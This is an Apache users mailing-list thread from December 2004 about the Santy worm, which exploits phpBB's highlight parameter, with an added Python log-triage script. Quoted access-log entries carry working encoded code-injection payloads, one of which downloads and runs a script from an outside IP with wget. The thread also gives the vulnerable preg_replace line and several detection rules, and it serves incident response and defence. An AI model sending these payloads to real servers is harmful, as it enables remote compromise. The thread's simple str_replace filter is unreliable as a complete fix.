Posted to users@httpd.apache.org by Anders Norrbring <li...@norrbring.se> on 2004/12/25 10:03:00 UTC

[users@httpd] Is this for real?

Does anybody have any ideas about this e-mail?  My admin inbox was full of these e-mails this morning, I don't know if
they're for real, or what...  Can someone please advise? There is one phpbb running on the server...


HEADERS:

Return-Path: <ww...@iris>
Received: from mail.the-server.net ([unix socket])
	by iris (Cyrus v2.1.15) with LMTP; Sat, 25 Dec 2004 00:50:24 +0100
X-Sieve: CMU Sieve 2.2
Received: from localhost (localhost [127.0.0.1])
	by mail.the-server.net (Postfix) with ESMTP id D8D11CA8E;
	Sat, 25 Dec 2004 00:50:23 +0100 (CET)
Received: from mail.the-server.net ([127.0.0.1])
 by localhost (iris [127.0.0.1]) (amavisd-new, port 10024) with LMTP
 id 13131-05-2; Sat, 25 Dec 2004 00:48:50 +0100 (CET)
Received: by mail.the-server.net (Postfix, from userid 30)
	id 00F16C874; Sat, 25 Dec 2004 00:48:48 +0100 (CET)
Date: Sat, 25 Dec 2004 00:48:48 +0100
To: postmaster, hostmaster, abuse, admin, root
Subject: YOUR SERVER HAS BEEN HACKED
Message-ID: <41...@iris.the-server.net>
User-Agent: nail 10.5 4/27/03
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
From: wwwrun (WWW daemon apache)
X-Virus-Scanned: by Kaspersky, NOD32 & F-Secure at the-server.net


MESSAGE BODY:

YOUR SERVER HAS BEEN OWNED VIA PHPBB, PLEASE UPGRADE PHP AND PHPBB IMMEDIATELY


---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
   "   from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org


Re: [users@httpd] Is this for real?

Posted by Shannon Eric Peevey <sp...@unt.edu>.
>>> At 10:47 -0700 21/12/2004, mark@onnow.net wrote:
>>
>> From what I have read, this can happen in any phpbb version lower
>> than 2.0.11
>>
>> This exploit is becoming frequent.  Normally uploading a ddos bot.
>
Note, according to this thread from bugtraq, there is a new variant of
this worm that affects 2.0.11 as well:

http://securityfocus.com/archive/1/385465/2004-12-23/2004-12-29/2

Also, please trim your messages, as it is difficult to follow the thread 
through such a long message. 

thanks,

-- 
Shannon Eric Peevey                     =>  "speeves"
Dyno-Mite! System Administrator         =>  speeves@unt.edu
Central Web Support                     =>  (940) 369-8876
University of North Texas               =>  http://web2.unt.edu




Re: [users@httpd] Is this for real?

Posted by Norman Peelman <np...@cfl.rr.com>.
----- Original Message ----- 
From: "Anders Norrbring" <li...@norrbring.se>
To: <us...@httpd.apache.org>
Cc: <da...@pa.press.net>
Sent: Saturday, December 25, 2004 5:47 AM
Subject: RE: [users@httpd] Is this for real?


>
> Thanks.. (?)
>
> Yep, one of my hosting clients has a phpBB up and running, or rather, HAD
> it up and running. I killed it for now.
> I posted in phpBB forums too, it's a vulnerability in PHP and phpBB that
> allows a worm named Perl.Santy to exploit the server.
> Related reading:
> http://news.zdnet.com/2100-1009_22-5499725.html?tag=nl.e589
>
> I took his site offline and moved all his files out to tape for the time
> being, if my client can't fix it, he's out of the system...
>
> Will upgrading phpBB "kill" the worm, or is my server in danger anyway?
> How do I kill and delete the worm effectively?
>
> I ran Kaspersky AV scanner on the phpBB directories and the /usr/share/php
> directories, it didn't find anything.  Also, I had a perl process running
> that took 96.6% of the server's CPU time; after deleting the phpBB and
> restarting the server, perl isn't active at all.
>
> Am I safe? Or is the disaster coming?
>
>
> Thanks anyway, and have a great rest of the holidays!
> Anders Norrbring
> Norrbring Consulting
>
>
> > >66.220.28.92 - - [21/Dec/2004:18:07:17 +1100] "GET
> > >/forum/viewtopic.php?p=1445&sid=d2260869a73fb5aca2aed0d8a88cf55a&high
> > >light=%2527%252Esystem(chr(112)%252echr(101)%252echr(114)%252echr(108)
> > >%252echr(32)%252echr(45)%252echr(101)%252echr(32)%252echr(34)%252echr(
> > >111)%252echr(112)%252echr(101)%252echr(110)%252echr(32)%252echr(79)%25
> > >2echr(85)%252echr(84)%252echr(44)%252echr(113)%252echr(40)%252echr(62)
> > >%252echr(109)%252echr(49)%252echr(104)%252echr(111)%252echr(50)%252ech
> > >r(111)%252echr(102)%252echr(41)%252echr(32)%252echr(97)%252echr(110)%2
> > >52echr(100)%252echr(32)%252echr(112)%252echr(114)%252echr(105)%252echr
> > >(110)%252echr(116)%252echr(32)%252echr(113)%252echr(40)%252echr(72)%25
> > >2echr(89)%252echr(118)%252echr(57)%252echr(112)%252echr(111)%252echr(5
> > >2)%252echr(122)%252echr(51)%252echr(106)%252echr(106)%252echr(72)%252e
> > >chr(87)%252echr(97)%252echr(110)%252echr(78)%252echr(41)%252echr(34))%
> > >252e%2527
> > >HTTP/1.0" 200 270
> > >"http://www.noobforces.net/forum/viewtopic.php?p=1445&sid=d2260869a73
> > >fb5aca2aed0d8a88cf55a&highlight=%2527%252Esystem(chr(112)%252echr(101)
> > >%252echr(114)%252echr(108)%252echr(32)%252echr(45)%252echr(101)%252ech
> > >r(32)%252echr(34)%252echr(111)%252echr(112)%252echr(101)%252echr(110)%
> > >252echr(32)%252echr(79)%252echr(85)%252echr(84)%252echr(44)%252echr(11
> > >3)%252echr(40)%252echr(62)%252echr(109)%252echr(49)%252echr(104)%252ec
> > >hr(111)%252echr(50)%252echr(111)%252echr(102)%252echr(41)%252echr(32)%
> > >252echr(97)%252echr(110)%252echr(100)%252echr(32)%252echr(112)%252echr
> > >(114)%252echr(105)%252echr(110)%252echr(116)%252echr(32)%252echr(113)%
> > >252echr(40)%252echr(72)%252echr(89)%252echr(118)%252echr(57)%252echr(1
> > >12)%252echr(111)%252echr(52)%252echr(122)%252echr(51)%252echr(106)%252
> > >echr(106)%252echr(72)%252echr(87)%252echr(97)%252echr(110)%252echr(78)
> > >%252echr(41)%252echr(34))%252e%2527"
> > >"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
> > >
> > >--

  Well, it's not really a bug in PHP. 'preg_replace' specifically uses the
'e' switch for part of its functionality, see:
http://us4.php.net/manual/en/reference.pcre.pattern.modifiers.php .  It is
the programmer's responsibility to make sure that offending variables are
clean before using them. A simple patch would be to add a line (or lines) that
cleans the variable 'highlight' (as seen in the code at the end of the first
line, start of second line) so that it doesn't contain the offending
characters:

$highlight = str_replace('%252Esystem','',$highlight);
$highlight = str_replace('%252echr(','',$highlight);

---

...should stop this worm in its tracks.

Norm
---
FREE Avatar Hosting at www.easyavatar.com
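Shannon Lee's post, quoted further down the thread, describes translating the chr() calls from the log back into the worm's Perl; the two str_replace() lines above key on the same encoded text. Below is an added example, not code from this thread and not phpBB's own, that does that translation for the three payload shapes quoted in the thread (system(chr()...), fwrite(fopen(chr()...)) and passthru() on a second parameter) and flags the tell-tale of this exploit: a highlight value that still contains %xx escapes after the web server has decoded it once (the %2527 and %252e in every payload quoted here), something a legitimate highlight word never needs. The log lines embedded in it are constructed single-line copies of the entries quoted in the thread, with the referer replaced by "-", plus one invented benign request (10.0.0.5) for comparison.

```python
"""Triage of phpBB "highlight" exploit requests from an Apache access log.

Added example for this thread (not code posted by any participant, not phpBB's
own).  SAMPLE_LOG holds constructed one-line copies of the entries quoted in the
thread, with the referer replaced by "-", plus one invented benign request."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

REQUEST_RE = re.compile(r'"(?:GET|POST) (?P<uri>\S+) HTTP/\d\.\d"')
CHR_CHAIN_RE = re.compile(r'chr\(\d+\)(?:\.chr\(\d+\))*')
CHR_RE = re.compile(r'chr\((\d+)\)')
CALL_RE = re.compile(r'\b(system|passthru|exec|shell_exec)\("((?:[^"\\]|\\.)*)"\)')
GETVAR_RE = re.compile(r"\$HTTP_GET_VARS\['?(\w+)'?\]")


def php_quote(text):
    """Render text as a PHP double-quoted literal so the decoded code stays readable."""
    return '"' + text.replace('\\', '\\\\').replace('"', '\\"').replace('\n', '\\n') + '"'


def php_unquote(body):
    """Undo php_quote on the body of such a literal."""
    return re.sub(r'\\(.)', lambda m: '\n' if m.group(1) == 'n' else m.group(1), body)


def fold_chr(php):
    """Replace chr(112).chr(101)... chains with the string literal they build."""
    return CHR_CHAIN_RE.sub(
        lambda m: php_quote(''.join(chr(int(n)) for n in CHR_RE.findall(m.group(0)))), php)


def analyze(log_line):
    """Reconstruct what one request would have made phpBB 2.0.10 evaluate.

    params:         the query as PHP handed it to the script (decoded once)
    double_encoded: 'highlight' still held %xx escapes after that first decode
    php:            the text spliced into the preg_replace() /e replacement code
    shell:          the OS command given to system()/passthru(), where visible
    """
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    params = parse_qs(urlsplit(m.group('uri')).query, keep_blank_values=True)
    once = params.get('highlight', [''])[0]
    twice = unquote(once)                 # the second decode the exploit relies on
    php = fold_chr(twice)
    shell = None
    ref = GETVAR_RE.search(php)           # shape 3: passthru($HTTP_GET_VARS[rush])
    if ref and ref.group(1) in params:
        shell = params[ref.group(1)][0]
    else:
        call = CALL_RE.search(php)        # shape 1: system("...") after fold_chr
        if call:
            shell = php_unquote(call.group(2))
    return {'params': params, 'double_encoded': once != twice, 'php': php, 'shell': shell}


SAMPLE_LOG = [  # constructed, see module docstring
    # Santy as seen by L. Walker: system("perl -e ...") appends one chunk of the worm
    '66.220.28.92 - - [21/Dec/2004:18:07:17 +1100] "GET /forum/viewtopic.php?p=1445&sid='
    'd2260869a73fb5aca2aed0d8a88cf55a&highlight=%2527%252Esystem(chr(112)'
    '%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(45)%252echr(101)%252echr(32)'
    '%252echr(34)%252echr(111)%252echr(112)%252echr(101)%252echr(110)%252echr(32)%252echr(79)'
    '%252echr(85)%252echr(84)%252echr(44)%252echr(113)%252echr(40)%252echr(62)%252echr(109)'
    '%252echr(49)%252echr(104)%252echr(111)%252echr(50)%252echr(111)%252echr(102)%252echr(41)'
    '%252echr(32)%252echr(97)%252echr(110)%252echr(100)%252echr(32)%252echr(112)%252echr(114)'
    '%252echr(105)%252echr(110)%252echr(116)%252echr(32)%252echr(113)%252echr(40)%252echr(72)'
    '%252echr(89)%252echr(118)%252echr(57)%252echr(112)%252echr(111)%252echr(52)%252echr(122)'
    '%252echr(51)%252echr(106)%252echr(106)%252echr(72)%252echr(87)%252echr(97)%252echr(110)'
    '%252echr(78)%252echr(41)%252echr(34))%252e%2527'
    ' HTTP/1.0" 200 270 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"',
    # Shannon Lee's log: the first chunk of the worm is written straight from PHP
    '64.235.234.84 - - [20/Dec/2004:08:41:35 -0800] "GET /viewtopic.php?p=9002&sid='
    'f5399a2d243cead3a5ea7adf15bfc872&highlight=%2527%252Efwrite(fopen(chr(109)'
    '%252echr(49)%252echr(104)%252echr(111)%252echr(50)%252echr(111)%252echr(102),chr(97)),'
    'chr(35)%252echr(33)%252echr(47)%252echr(117)%252echr(115)%252echr(114)%252echr(47)'
    '%252echr(98)%252echr(105)%252echr(110)%252echr(47)%252echr(112)%252echr(101)%252echr(114)'
    '%252echr(108)%252echr(10)%252echr(117)%252echr(115)%252echr(101)%252echr(32)),exit%252e%2527'
    ' HTTP/1.0" 200 13648 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"',
    # Sebastian Wiesinger's log: shell command in "rush", highlight only calls passthru()
    '66.119.13.4 - - [22/Dec/2004:10:06:47 +0100] "GET /forum/viewtopic.php?t=%37&rush='
    '%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20%63%64%20%2F%74%6D%70%3B%77%67%65%74%20%31%32%38'
    '%2E%31%37%34%2E%31%33%37%2E%32%33%30%2F%62%6E%20%2D%4F%20%2E%62%3B%20%70%65%72%6C%20%2D%70%65'
    '%20%79%2F%74%68%6D%76%64%77%30%39%38%37%36%35%34%33%32%31%75%6F%69%65%61%2F%61%65%69%6F%75'
    '%31%32%33%34%35%36%37%38%39%30%77%64%76%74%68%6D%2F%20%2E%62%7C%20%70%65%72%6C%3B%20%72%6D'
    '%20%2D%66%20%2E%62%20%2A%2E%70%6C%20%62%30%74%2A%3B%20%65%63%68%6F%20%5F%45%4E%44%5F'
    '&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B'
    '%72%75%73%68%5D%29.%2527 HTTP/1.1" 200 12266 "-" "-"',
    # Invented benign request for comparison
    '10.0.0.5 - - [22/Dec/2004:10:10:00 +0100] "GET /forum/viewtopic.php?t=7'
    '&highlight=apache+module HTTP/1.1" 200 8000 "-" "-"',
]

if __name__ == '__main__':
    for line in SAMPLE_LOG:
        r = analyze(line)
        print(r['double_encoded'], '|', r['php'], '|', r['shell'])
```

Run as-is it prints one line per sample; pass your own access_log lines to analyze() to triage a server. Keying on the double encoding rather than on fixed strings also catches the passthru variant, which contains no chr() calls at all.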





RE: [users@httpd] Is this for real?

Posted by Anders Norrbring <li...@norrbring.se>.
Thanks.. (?)

Yep, one of my hosting clients has a phpBB up and running, or rather, HAD it up and running. I killed it for now.
I posted in phpBB forums too, it's a vulnerability in PHP and phpBB that allows a worm named Perl.Santy to exploit the
server.
Related reading: http://news.zdnet.com/2100-1009_22-5499725.html?tag=nl.e589

I took his site offline and moved all his files out to tape for the time being, if my client can't fix it, he's out of
the system...

Will upgrading phpBB "kill" the worm, or is my server in danger anyway?  How do I kill and delete the worm effectively?

I ran Kaspersky AV scanner on the phpBB directories and the /usr/share/php directories, it didn't find anything.  Also,
I had a perl process running that took 96.6% of the server's CPU time; after deleting the phpBB and restarting the
server, perl isn't active at all.

Am I safe? Or is the disaster coming?


Thanks anyway, and have a great rest of the holidays!
Anders Norrbring
Norrbring Consulting




> -----Original Message-----
> From: Dave Floyd [mailto:dave.floyd@pa.press.net]
> Sent: Saturday, December 25, 2004 11:13 AM
> To: users@httpd.apache.org
> Subject: Re: [users@httpd] Is this for real?
> 
> Anders,
> 	Sadly this is quite likely. See the appended messages for more details:
> 
> At 20:23 +1100 21/12/2004, L. Walker wrote:
> >Date: Tue, 21 Dec 2004 20:23:11 +1100 (EST)
> >Subject: Worm hitting PHPbb2 Forums
> >From: "L. Walker" <lw...@magi.net.au>
> >To: incidents@securityfocus.com
> >Cc: full-disclosure@lists.netsys.com
> >
> >Just spotted two clients hit by this.  One client didnt update his
> >software (PHP 4.3.4, Apache 1.3.22) and was rootkitted by generation 16.
> >Chkrootkit says it's Adore, however could be something else.  Datacenter
> >wasn't very smart and has since wiped the server, so no binaries or other
> >evidence.
> >
> >Generation 12 only wiped out PHP files, replacing them with its own
> >message on other client's PHPbb2 forum.  Access logs show:
> >
> >66.220.28.92 - - [21/Dec/2004:18:07:17 +1100] "GET
> >/forum/viewtopic.php?p=1445&sid=d2260869a73fb5aca2aed0d8a88cf55a&high
> >light=%2527%252Esystem(chr(112)%252echr(101)%252echr(114)%252echr(108)
> >%252echr(32)%252echr(45)%252echr(101)%252echr(32)%252echr(34)%252echr(
> >111)%252echr(112)%252echr(101)%252echr(110)%252echr(32)%252echr(79)%25
> >2echr(85)%252echr(84)%252echr(44)%252echr(113)%252echr(40)%252echr(62)
> >%252echr(109)%252echr(49)%252echr(104)%252echr(111)%252echr(50)%252ech
> >r(111)%252echr(102)%252echr(41)%252echr(32)%252echr(97)%252echr(110)%2
> >52echr(100)%252echr(32)%252echr(112)%252echr(114)%252echr(105)%252echr
> >(110)%252echr(116)%252echr(32)%252echr(113)%252echr(40)%252echr(72)%25
> >2echr(89)%252echr(118)%252echr(57)%252echr(112)%252echr(111)%252echr(5
> >2)%252echr(122)%252echr(51)%252echr(106)%252echr(106)%252echr(72)%252e
> >chr(87)%252echr(97)%252echr(110)%252echr(78)%252echr(41)%252echr(34))%
> >252e%2527
> >HTTP/1.0" 200 270
> >"http://www.noobforces.net/forum/viewtopic.php?p=1445&sid=d2260869a73
> >fb5aca2aed0d8a88cf55a&highlight=%2527%252Esystem(chr(112)%252echr(101)
> >%252echr(114)%252echr(108)%252echr(32)%252echr(45)%252echr(101)%252ech
> >r(32)%252echr(34)%252echr(111)%252echr(112)%252echr(101)%252echr(110)%
> >252echr(32)%252echr(79)%252echr(85)%252echr(84)%252echr(44)%252echr(11
> >3)%252echr(40)%252echr(62)%252echr(109)%252echr(49)%252echr(104)%252ec
> >hr(111)%252echr(50)%252echr(111)%252echr(102)%252echr(41)%252echr(32)%
> >252echr(97)%252echr(110)%252echr(100)%252echr(32)%252echr(112)%252echr
> >(114)%252echr(105)%252echr(110)%252echr(116)%252echr(32)%252echr(113)%
> >252echr(40)%252echr(72)%252echr(89)%252echr(118)%252echr(57)%252echr(1
> >12)%252echr(111)%252echr(52)%252echr(122)%252echr(51)%252echr(106)%252
> >echr(106)%252echr(72)%252echr(87)%252echr(97)%252echr(110)%252echr(78)
> >%252echr(41)%252echr(34))%252e%2527"
> >"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
> >
> >--
> >L. Walker <lwalker at magi dot net dot au>
> >Network Administrator / Consultant
> >--
> >
> >>At 12:46 -0500 21/12/2004, Christopher Adickes wrote:
> >
> >In addition to your post here is some more info.
> >
> >http://isc.sans.org/
> >
> >>At 10:47 -0700 21/12/2004, mark@onnow.net wrote:
> >
> >From what I have read, this can happen in any phpbb version lower than 2.0.11
> >
> >This exploit is becoming frequent.  Normally uploading a ddos bot.
> >>
> >>At 12:53 -0500 21/12/2004, Chris Ess wrote:
> >>
> >>Generation 9 appears to overwrite files with the following extensions:
> >>.htm, .php, .asp, .shtm, .jsp, .phtm
> >>
> >>It only displays a defacement message saying
> >>
> >>"NeverEverNoSanity WebWorm generation #"
> >>
> >>Where # is the generation of the worm.
> >>
> >>This bug only exploits a hole in phpBB2 as far as I can tell.  It does not
> >>appear to exploit a hole within PHP.  In order to protect yourself, you
> >>must upgrade phpBB2 to version 2.0.11.  See
> >>http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=240513
> >>
> >>The only code modification that this worm appears to do is to increment its
> >>generation count every time it hits a server.  Generation 9 does not
> >>contain anything that would indicate the ability to install a rootkit.  I
> >>suspect that the rootkit may have been installed separately.
> >>
> >>I extracted a full copy of generation 9 of this worm based on the access
> >>logs of a site hit by it.  I was going to do a code review whenever I got
> >>the chance to properly do one.
> >>
> >>Sincerely,
> >>
> >>
> >>Chris Ess
> >System Administrator / CDTT (Certified Duct Tape Technician)
> >
> >>At 11:29 -0700 21/12/2004, lists <li...@innocence-lost.net> wrote:
> >
> >Funny enough, I got a message from a former employer about this worm
> >yesterday- a box I had setup that had hardened php on it got hit hard by
> >this worm. I must've misread the advisory as I was under the impression
> >that the Hardened PHP patches protected PHP through canary values from
> >this bug? Or does it use more than just unserialize() (i.e. realpath() )
> >
> >>At 14:14 -0500 21/12/2004, Chris Ess wrote:
> >
> >> Funny enough, I got a message from a former employer about this worm
> >> yesterday - a box I had setup that had hardened php on it got hit hard by
> >> this worm. I must've misread the advisory as I was under the impression
> >> that the Hardened PHP patches protected PHP through canary values from
> >> this bug? Or does it use more than just unserialize() (i.e. realpath() )
> >
> >This worm appears to have nothing to do with the bugs fixed in versions
> >4.3.10 and 5.0.3 of PHP.
> >
> >The bug occurs in this line in viewtopic.php in phpBB2:
> >(Formatting changed to make it look pretty.  It's line 1109 in phpBB2
> >2.0.10)
> >
> >$message = str_replace('\"', '"',
> >	substr(preg_replace('#(\>(((?>([^><]+|(?R)))*)\<))#se',
> >	"preg_replace('#\b(" . $highlight_match . ")\b#i',
> >	'<span style=\"color:#"
> >	. $theme['fontcolor3'] . "\"><b>\\\\1</b></span>', '\\0')", '>' .
> >	$message . '<'), 1, -1));
> >
> >The 'e' flag on the regex pattern tells it to interpret the statement as
> >valid PHP code and run it.  (Reference is:
> >http://www.php.net/manual/en/reference.pcre.pattern.modifiers.php)
> >
> >The bug that is exploited works in such a way that it actually runs the
> >command that is passed through the highlight GET variable.  I'm not 100%
> >sure how this works since I haven't had the chance to correlate the
> >strings recorded in apache's access log with the above code.
> >
> >>At 12:21 -0700 21/12/2004, lists wrote:
> >
> >Yea good catch, after looking into it a little further I found that it
> >wasn't related to that advisory, but rather to one from 11.13.04, the
> >exploit code of the original bug can be found on k-otik.com
> >
> >Thanks for the info
> >
> >>At 21:00 +0000 21/12/2004, Barrie Dempster <ba...@reboot-robot.net> wrote:
> >
> >More information:
> >
> >Mis-reported and then corrected at the ISC -
> >http://isc.sans.org/diary.php?date=2004-12-21
> >
> >* The advisory is here - htp://howdark.com/
> >(it was there when the advisory was initially released but that site
> >seems down atm, included here in hope that howdark.com resurfaces)
> >
> >* The fix is here - http://www.phpbb.com/phpBB/viewtopic.php?t=240513
> >
> >* The exploit is here - http://www.howdark.com/poc/phpbb2010_hl.phps
> >(down as above, but included here as it was the original source, try
> >here http://www.k-otik.com/exploits/20041122.r57phpbb2010.pl.php )
> >
> >* SNORT Rule is here - http://www.webservertalk.com/message554529.html
> >
> >* If you got owned by this then your Christmas present is here
> >http://ysati.com hehe ;-P
> >
> >With Regards..
> >Barrie Dempster (zeedo) - Fortiter et Strenue
> >
> >>At 13:28 -0500 21/12/2004, Mike <mi...@shaw.ca> wrote:
> >
> >Does this affect PHPBB2 in general, or is it platform specific as well?
> >
> >>At 19:53 -0500 21/12/2004, M. Shirk wrote:
> >
> >I missed an important "F" on my previous post for these snort sigs.
> >
> >alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS
> >(msg:"BLEEDING-EDGE phpBB Highlighting Code Execution - Santy.A
> >Worm"; flow:to_server,established; uricontent:"/viewtopic.php?";
> >nocase; uricontent:"&highlight='.fwrite(fopen("; nocase;
> >reference:url,www.phpbb.com/phpBB/viewtopic.php?f=14&t=240513;
> >sid:9999999; rev:1;)
> >
> >Shirkdog
> >http://www.shirkdog.us
> >
> >
> 
> At 15:51 -0800 20/12/2004, Shannon Lee wrote:
> >X-VirusChecked: Checked
> >X-Env-Sender: bugtraq-return-17330-dave.floyd=pa.press.net@securityfocus.
> >  com
> >X-StarScan-Version: 5.4.5; banners=-,-,-
> >X-Originating-IP: [205.206.231.26]
> >X-SpamWhitelisted: domain whitelist
> >Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
> >List-Id: <bugtraq.list-id.securityfocus.com>
> >List-Post: <ma...@securityfocus.com>
> >List-Help: <ma...@securityfocus.com>
> >List-Unsubscribe: <ma...@securityfocus.com>
> >List-Subscribe: <ma...@securityfocus.com>
> >Delivered-To: mailing list bugtraq@securityfocus.com
> >Delivered-To: moderator for bugtraq@securityfocus.com
> >Date: Mon, 20 Dec 2004 15:51:13 -0800
> >From: Shannon Lee <sh...@webhostworks.net>
> >User-Agent: Mozilla Thunderbird 0.7.3 (X11/20040803)
> >X-Accept-Language: en-us, en
> >To: bugtraq@securityfocus.com
> >Subject: phpBB Worm
> >
> >This morning one of our client's sites was found to have been defaced
> >with the words "NeverEverNoSanity WebWorm Generation 9."  The defacement
> >appeared to take place on all .html files in the web root trees of
> >multiple virtual hosts on the web server in a very short period of time.
> >
> >After some investigation, we determined that the attacker had gained
> >access via phpbb in a series of crafted URL requests, like so:
> >
> >64.235.234.84 - - [20/Dec/2004:08:41:35 -0800] "GET
> >/viewtopic.php?p=9002&sid=f5
> >399a2d243cead3a5ea7adf15bfc872&highlight=%2527%252Efwrite(fopen(chr(1
> >09)%252echr
> >(49)%252echr(104)%252echr(111)%252echr(50)%252echr(111)%252echr(102),
> >chr(97)),ch
> >r(35)%252echr(33)%252echr(47)%252echr(117)%252echr(115)%252echr(114)%
> >252echr(47)
> >%252echr(98)%252echr(105)%252echr(110)%252echr(47)%252echr(112)%252ec
> >hr(101)%252
> >echr(114)%252echr(108)%252echr(10)%252echr(117)%252echr(115)%252echr(
> >101)%252ech
> >r(32)),exit%252e%2527 HTTP/1.0" 200 13648 "http://forum.CLIENT SITE
> >OMITTED.com/
> >viewtopic.php?p=9002&sid=f5399a2d243cead3a5ea7adf15bfc872&highlight=%
> >2527%252Efw
> >rite(fopen(chr(109)%252echr(49)%252echr(104)%252echr(111)%252echr(50)
> >%252echr(11
> >1)%252echr(102),chr(97)),chr(35)%252echr(33)%252echr(47)%252echr(117)
> >%252echr(11
> >5)%252echr(114)%252echr(47)%252echr(98)%252echr(105)%252echr(110)%252
> >echr(47)%25
> >2echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(10)%252echr
> >(117)%252ec
> >hr(115)%252echr(101)%252echr(32)),exit%252e%2527" "Mozilla/4.0
> >(compatible; MSIE 6.0; Windows NT 5.1)"
> >
> >After checking the phpbb site, it turns out that this is a vulnerability
> >posted the 18th of November, called Hilight; we didn't update to prevent
> >it because the client whose domain it was has their own admin, and we
> >thought he was taking care of phpBB.  Oops.  The exploit is described here:
> >
> >http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=240513
> >
> >When I copied all these entries out of the log and translated the chr()
> >calls, they turned out to be the attached perl script, which is capable
> >of finding .html files to deface, and then going to google and finding
> >more instances of phpbb to infect.  Which makes it a worm.  It also
> >tracks itself by generation; we were generation 9.
> >
> >Please find attached the above-mentioned script as well as the series of
> >log entries from access_log.
> >
> >--Shannon
> >
> >
> >
> >At 23:28 +0100 21/12/2004, Raymond Dijkxhoorn wrote:
> >>
> >>If you cannot fix it (virtual servers) fast for all your clients
> >>you could also try with something like this:
> >>
> >>        RewriteEngine On
> >>        RewriteCond %{QUERY_STRING} ^(.*)echr(.*) [OR]
> >>        RewriteCond %{QUERY_STRING} ^(.*)esystem(.*)
> >>        RewriteRule ^.*$                                -               [F]
> >>
> >>We had some vhosts where this worked just fine. On our systems we
> >>didn't see any valid request with echr and esystem, just be gentle
> >>with it, it works for me, it could work for you ;)
> >
> >At 15:11 -0500 21/12/2004, Paul Kurczaba wrote:
> >>
> >>It seems that a good number of sites have been compromised due to this
> >>exploit. Doing a search for "NeverEverNoSanity WebWorm Generation" on google
> >>revealed nothing. But, when I did the same search on the new MSN beta search
> >>engine, a whopping 36,000 hits showed up. Check it out:
> >>http://beta.search.msn.com/results.aspx?q=%22NeverEverNoSanity+WebWo
> >>rm+Generation%22&FORM=QBRE
> >
> >At 12:22 +0100 22/12/2004, Sebastian Wiesinger <bo...@fire-world.de> wrote:
> >> > We had some vhosts where this worked just fine. On our systems we didn't
> >>> see any valid request with echr and esystem, just be gentle with it, it
> >>> works for me, it could work for you ;)
> >>
> >>If you use mod_security, this may help, too:
> >>
> >>SecFilterSelective "THE_REQUEST"
> >>"(system|exec|passthru|popen|shell_exec|proc_open|fopen|fwrite)\s*\("
> >> >>
> >>I had another exploit attempt, with this payload:
> >>
> >>66.119.13.4 - - [22/Dec/2004:10:06:47 +0100] "GET
> >>/forum/viewtopic.php?t=%37&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3
> >>B%20%63%64%20%2F%74%6D%70%3B%77%67%65%74%20%31%32%38%2E%31%37%34%2E%31
> >>%33%37%2E%32%33%30%2F%62%6E%20%2D%4F%20%2E%62%3B%20%70%65%72%6C%20%2D%
> >>70%65%20%79%2F%74%68%6D%76%64%77%30%39%38%37%36%35%34%33%32%31%75%6F%6
> >>9%65%61%2F%61%65%69%6F%75%31%32%33%34%35%36%37%38%39%30%77%64%76%74%68
> >>%6D%2F%20%2E%62%7C%20%70%65%72%6C%3B%20%72%6D%20%2D%66%20%2E%62%20%2A%
> >>2E%70%6C%20%62%30%74%2A%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=
> >>%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%
> >>52%53%5B%72%75%73%68%5D%29.%2527 HTTP/1.1" 200 12266 "-" "-"
> >>
> >>Which decodes to:
> >>
> >>rush=echo _START_; cd /tmp;wget 128.174.137.230/bn -O .b; perl -pe
> >>y/thmvdw0987654321uoiea/aeiou1234567890wdvthm/ .b| perl; rm -f .b
> >>*.pl b0t*; echo _END_
> >>highlight='.passthru($HTTP_GET_VARS[rush]).'
> >>
> >>Regards,
> >>
> >>Sebastian
> >
> >At 17:21 +0200 22/12/2004, Alexander Klimov <al...@inbox.ru> wrote:
> >>
> >>It seems that automated exploiting starts soon after disclosure of the
> >>vulnerability:
> >>
> >>62.221.209.145 - - [24/Nov/2004:14:09:05 +0200]
> >>"GET /viewtopic.php?t=50674&highlight=
> >>%2527%252esystem(chr(100)%252echr(105)%252echr(114))%252edie()%252e%2527
> >>HTTP/1.1" 404 219
> >>
> >>Interestingly, we do not use phpbb and in fact do not have
> >>viewtopic.php at all.
> >
> >At 4:34 +0000 22/12/2004, <yc...@sneakemail.com> wrote:
> >>
> >>Forgive me if this is a newbie question, but a site I help run was
> >>hit by this, and I'm trying to understand it to protect against
> >>future worms.
> >>
> >>The worm exploits the phpBB highlight vulnerability.  It uses PHP
> >>to run Perl to write the Perl script file, then executes it.  The
> >>script then proceeds to traverse the entire directory structure,
> >>overwriting .php, .htm, .shtm, .phtm, and on our server, .ssi
> >>files, and then spreads itself.  Correct?
> >>
> >>I have two questions:
> >>
> >>1.  Why has the worm been as effective on Windows servers as on
> >>*nix servers?  At the very least, shouldn't the difference in file
> >>and directory naming cause a problem?  I looked at the decoded Perl
> >>script, but I'm not a Perl expert, so I couldn't understand all of
> >>it.  And what about the difference in file permissions?
> >>
> >>2.  More importantly, why wasn't the worm's destructive ability
> >>limited by file permissions, especially on *nix servers?  If, for
> >>example, an HTML file on the server was uploaded by user bob, and
> >>has permissions of 755, how can the Perl script delete that file?
> >>Shouldn't the Perl script be created with the Perl process's
> >>permissions, which was invoked by PHP, which should have the Web
> >>server's permissions, which should be, at least on most *nix
> >>servers, the nobody user?
> >>
